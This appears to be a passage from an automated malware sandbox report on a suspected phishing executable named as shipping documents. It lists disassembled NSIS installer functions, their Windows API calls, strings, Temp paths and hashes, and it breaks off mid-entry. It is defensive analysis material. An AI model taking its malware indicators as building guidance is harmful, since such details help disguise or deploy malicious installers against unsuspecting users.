                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                        • String ID: IsWow64Process2$KERNEL32
                                        • API String ID: 977827838-1019154776
                                        • Opcode ID: 2bcfab48608436a10e47b3dcd3cb787af1425c809e75d71b2655ec8cf541d14b
                                        • Instruction ID: b468e029d4233696777abd10a77843f3d9114a0b23527e5c4b4931cf7e8535de
                                        • Opcode Fuzzy Hash: 2bcfab48608436a10e47b3dcd3cb787af1425c809e75d71b2655ec8cf541d14b
                                        • Instruction Fuzzy Hash: E0014075D00649BADB02AAE4CC45AEF7FBD9F06254F104052A931E2191EB78EA05C761
                                        Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                        • GetMessagePos.USER32 ref: 00404EB4
                                        • ScreenToClient.USER32(?,?), ref: 00404ECE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                        Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                        • MulDiv.KERNEL32(0002F000,00000064,000B2368), ref: 00402FE1
                                        • wsprintfW.USER32 ref: 00402FF1
                                        • SetWindowTextW.USER32(?,?), ref: 00403001
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402FEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                        Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                        • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                        Function 00405F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405F87
                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 3248276644-4229099359
                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                        • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                        Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                        • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                        Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E56
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                        • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                        Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                        • wsprintfW.USER32 ref: 00404E2D
                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                        Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405EDF
                                        • CharNextW.USER32(00000000), ref: 00405EE4
                                        • CharNextW.USER32(00000000), ref: 00405EFC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsi1309.tmp, xrefs: 00405ED2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 3213498283-3576001853
                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                        Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3936084776
                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                        Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 0040269A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp$C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
                                        • API String ID: 1659193697-3689442400
                                        • Opcode ID: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                        • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                        • Opcode Fuzzy Hash: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                        • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                        Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                        • GetTickCount.KERNEL32 ref: 0040304F
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                        • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
